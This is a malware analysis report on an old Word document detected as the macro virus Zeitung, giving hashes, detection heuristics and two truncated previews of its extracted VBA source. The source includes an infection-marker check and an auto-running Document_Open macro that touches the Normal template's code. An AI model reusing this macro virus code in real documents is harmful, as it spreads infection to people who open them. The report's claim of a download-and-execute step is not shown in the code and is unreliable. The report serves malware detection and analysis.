Office (OLE) malware analysis — malicious · df1f61939850fb12

MALICIOUS

Office (OLE)

70.5 KB Created: 1997-04-26 16:26:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 7074fc60829c8d81427a5efd57db9f5e SHA-1: f604691d6852d0f5476564b6a8a546261655e923 SHA-256: df1f61939850fb12aae7046bb7f09017e1130fddabc79fcde46550c90984930f

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing VBA macros, specifically a Document_Open macro designed to execute automatically. The ClamAV detection 'Doc.Trojan.Zeitung-4' and the presence of the 'VirusZeitung' signature within the VBA code suggest a trojanized document. The macro's logic appears to be designed to download and execute a secondary payload, although the exact mechanism is obfuscated and truncated.

Heuristics 3

ClamAV: Doc.Trojan.Zeitung-4 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Zeitung-4
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 97037 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	97037 bytes
SHA-256: `a0d2af9a2f9ab30e5abd8882387300d9c6e0f0c017175aa006900e15c44b7ce8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Const Signature = "VirusZeitung" 'ñèãíàòóðà âèðóñà 'èó îäë:ÀêäéÔíðâêé ëêàä ôåî èàëØòëâ@Âðññçàè ðàè èàåñè,ÀåñíðÅðìâèÌõè ààî '2 'íîìåð 2 çà 2000 ãîä Dim sd, reg As Boolean Private Function Kontaminat(O) If Not O.codemodule.Find(Signature, 1, 1, 100, 100) Then Kontaminat = 0 Else If O.codemodule.countoflines < 50 Then Kontaminat = 0 Else Ant$ = Trim(O.codemodule.lines(3, 1)) Ant$ = Trim(Mid(Ant$, 2, Len(Ant$) - 1)) If Val(Ant$) < 65535 Then Kontaminat = Val(Ant$) Else Kontaminat = -1 End If End If End If End Function Private Sub Document_Open() On Error Resume Next Dim ad, nt As Object Set nt = NormalTemplate.VBProject.VBComponents.Item(1) Set ad = ActiveDocument.VBProject.VBComponents.Item(1) If Mid(ActiveDocument.Name, 1, 12) = "Àäñêèé îãîíü" Then Exit Sub End If reg = False p = 0.05 Tag$ = "" Monat$ = "" datum$ = Trim(Date) i = 1 While (Mid(datum$, i, 1) <> ".") And (i < Len(datum$)) Tag$ = Tag$ + Mid(datum$, i, 1) i = i + 1 Wend i = i + 1 While (Mid(datum$, i, 1) <> ".") And (i < Len(datum$)) Monat$ = Monat$ + Mid(datum$, i, 1) i = i + 1 Wend If (Val(Monat$) = 2) And (Val(Tag$) = 2) Then p = 2 ' 2 ôåâðàëÿ If (Val(Monat$) = 3) And (Val(Tag$) = 21) Then p = 2 ' 21 ìàðòà If (Val(Monat$) = 4) And (Val(Tag$) = 30) Then p = 2 ' 30 àïðåëÿ If (Val(Monat$) = 6) And (Val(Tag$) = 21) Then p = 2 ' 21 èþíÿ If (Val(Monat$) = 8) And (Val(Tag$) = 2) Then p = 2 ' 2 àâãóñòà If (Val(Monat$) = 9) And (Val(Tag$) = 21) Then p = 2 ' 21 ñåíòÿáðÿ If (Val(Monat$) = 10) And (Val(Tag$) = 31) Then p = 2 ' 31 îêòÿáðÿ If (Val(Monat$) = 12) And (Val(Tag$) = 21) Then p = 2 ' 21 äåêàáðÿ If Rnd >= p Then Exit Sub End If Documents.Add Template:="Normal", NewTemplate:=False With ActiveDocument.PageSetup .LineNumbering.Active = False .Orientation = wdOrientPortrait .TopMargin = CentimetersToPoints(1.5) .BottomMargin = CentimetersToPoints(1.5) .LeftMargin = CentimetersToPoints(2.5) .RightMargin = CentimetersToPoints(2) .Gutter = CentimetersToPoints(0) .HeaderDistance = CentimetersToPoints(1.25) .FooterDistance = CentimetersToPoints(1.25) .PageWidth = CentimetersToPoints(21) .PageHeight = CentimetersToPoints(29.7) .FirstPageTray = wdPrinterDefaultBin .OtherPagesTray = wdPrinterDefaultBin .SectionStart = wdSectionNewPage .OddAndEvenPagesHeaderFooter = False .DifferentFirstPageHeaderFooter = False .VerticalAlignment = wdAlignVerticalTop .SuppressEndnotes = False .MirrorMargins = False End With Druck_0 "À Ä Ñ Ê È É Î Ã Î Í Ü", 40, True, wdAlignParagraphCenter, 0, False Druck_0 "Âèðóñíàÿ ãàçåòà ñåêòû èì. Äæ. Äè è Ý. Êåëëè.", 18, False, wdAlignParagraphLeft, 0, True Druck_0 "Âûõîä ïî ìåðå êîìïëåêòîâàíèÿ íîìåðà", 18, False, wdAlignParagraphLeft, 0, True Druck_0 "10 ìàÿ 2000 ã. ¹ 2 (2)", 18, False, wdAlignParagraphLeft, 0, True Selection.TypeParagraph Druck_0 "Ñåãîäíÿ â íîìåðå:", 18, True, wdAlignParagraphLeft, 0, True Druck_0 "* Ìíåíèÿ ÷èòàòåëåé î ãàçåòå. (Ïîäáîðêà èíòåðâüþ)", 18, False, wdAlignParagraphLeft, 0, True Druck_0 "* Ïðåäëîæåíèÿ ïî óëó÷øåíèþ ðàáîòû ãàçåòû:", 18, False, wdAlignParagraphLeft, 0, True Druck_0 " Ìû ñîâåðøåíñòâóåì ñâîé âèðóñ.", 18, False, wdAlignParagraphLeft, 0, True Druck_0 " Íàñèëüíî ìèë íå áóäåøü.", 18, False, wdAlignParagraphLeft, 0, True Druck_0 " Ñâîé âèðóñ - ñâîèìè ðóêàìè. ", 18, False, wdAlignParagraphLeft, 0, True Druck_0 " Ìû - âàì, âû - íàì (î ïðîáëåìàõ îáðàòíîé ñâÿçè). ", 18, False, wdAlignParagraphLeft, 0, True Druck_0 "* Íàøè ïëàíû.", 18, False, wdAlignParagraphLeft, 0, True Selection.TypeParagraph Druck_0 "******************************", 18, True, wdAlignParagraphCenter, 0, ... (truncated)

SHA-256: a0d2af9a2f9ab30e5abd8882387300d9c6e0f0c017175aa006900e15c44b7ce8

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const Signature = "VirusZeitung" 'ñèãíàòóðà âèðóñà
'èó îäë:ÀêäéÔíðâêé ëêàä ôåî  èàëØòëâ@Âðññçàè ðàè èàåñè,ÀåñíðÅðìâèÌõè ààî
'2
'íîìåð 2 çà 2000 ãîä
Dim sd, reg As Boolean
Private Function Kontaminat(O)
 If Not O.codemodule.Find(Signature, 1, 1, 100, 100) Then
  Kontaminat = 0
 Else
  If O.codemodule.countoflines < 50 Then
   Kontaminat = 0
  Else
   Ant$ = Trim(O.codemodule.lines(3, 1))
   Ant$ = Trim(Mid(Ant$, 2, Len(Ant$) - 1))
   If Val(Ant$) < 65535 Then
    Kontaminat = Val(Ant$)
   Else
    Kontaminat = -1
   End If
 End If
 End If
End Function
Private Sub Document_Open()
 On Error Resume Next
 Dim ad, nt As Object
 Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
 Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
 If Mid(ActiveDocument.Name, 1, 12) = "Àäñêèé îãîíü" Then
  Exit Sub
 End If
 reg = False
 p = 0.05
 Tag$ = ""
 Monat$ = ""
 datum$ = Trim(Date)
 i = 1
 While (Mid(datum$, i, 1) <> ".") And (i < Len(datum$))
  Tag$ = Tag$ + Mid(datum$, i, 1)
  i = i + 1
 Wend
 i = i + 1
 While (Mid(datum$, i, 1) <> ".") And (i < Len(datum$))
  Monat$ = Monat$ + Mid(datum$, i, 1)
  i = i + 1
 Wend
 If (Val(Monat$) = 2) And (Val(Tag$) = 2) Then p = 2 ' 2  ôåâðàëÿ
 If (Val(Monat$) = 3) And (Val(Tag$) = 21) Then p = 2 ' 21 ìàðòà
 If (Val(Monat$) = 4) And (Val(Tag$) = 30) Then p = 2 ' 30 àïðåëÿ
 If (Val(Monat$) = 6) And (Val(Tag$) = 21) Then p = 2 ' 21 èþíÿ
 If (Val(Monat$) = 8) And (Val(Tag$) = 2) Then p = 2 ' 2  àâãóñòà
 If (Val(Monat$) = 9) And (Val(Tag$) = 21) Then p = 2 ' 21 ñåíòÿáðÿ
 If (Val(Monat$) = 10) And (Val(Tag$) = 31) Then p = 2 ' 31 îêòÿáðÿ
 If (Val(Monat$) = 12) And (Val(Tag$) = 21) Then p = 2 ' 21 äåêàáðÿ
 If Rnd >= p Then
  Exit Sub
 End If
 Documents.Add Template:="Normal", NewTemplate:=False
 With ActiveDocument.PageSetup
      .LineNumbering.Active = False
      .Orientation = wdOrientPortrait
      .TopMargin = CentimetersToPoints(1.5)
      .BottomMargin = CentimetersToPoints(1.5)
      .LeftMargin = CentimetersToPoints(2.5)
      .RightMargin = CentimetersToPoints(2)
      .Gutter = CentimetersToPoints(0)
      .HeaderDistance = CentimetersToPoints(1.25)
      .FooterDistance = CentimetersToPoints(1.25)
      .PageWidth = CentimetersToPoints(21)
      .PageHeight = CentimetersToPoints(29.7)
      .FirstPageTray = wdPrinterDefaultBin
      .OtherPagesTray = wdPrinterDefaultBin
      .SectionStart = wdSectionNewPage
      .OddAndEvenPagesHeaderFooter = False
      .DifferentFirstPageHeaderFooter = False
      .VerticalAlignment = wdAlignVerticalTop
      .SuppressEndnotes = False
      .MirrorMargins = False
 End With
 Druck_0 "À Ä Ñ Ê È É   Î Ã Î Í Ü", 40, True, wdAlignParagraphCenter, 0, False
 Druck_0 "Âèðóñíàÿ ãàçåòà ñåêòû èì. Äæ. Äè è Ý. Êåëëè.", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "Âûõîä ïî ìåðå êîìïëåêòîâàíèÿ íîìåðà", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "10 ìàÿ  2000  ã.   ¹ 2 (2)", 18, False, wdAlignParagraphLeft, 0, True
 Selection.TypeParagraph
 Druck_0 "Ñåãîäíÿ â íîìåðå:", 18, True, wdAlignParagraphLeft, 0, True
 Druck_0 "* Ìíåíèÿ ÷èòàòåëåé î ãàçåòå. (Ïîäáîðêà èíòåðâüþ)", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "* Ïðåäëîæåíèÿ ïî óëó÷øåíèþ ðàáîòû ãàçåòû:", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "** Ìû ñîâåðøåíñòâóåì ñâîé âèðóñ.", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "** Íàñèëüíî ìèë íå áóäåøü.", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "** Ñâîé âèðóñ - ñâîèìè ðóêàìè. ", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "** Ìû - âàì, âû - íàì (î ïðîáëåìàõ îáðàòíîé ñâÿçè). ", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "* Íàøè ïëàíû.", 18, False, wdAlignParagraphLeft, 0, True
 Selection.TypeParagraph
 Druck_0 "******************************", 18, True, wdAlignParagraphCenter, 0,
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.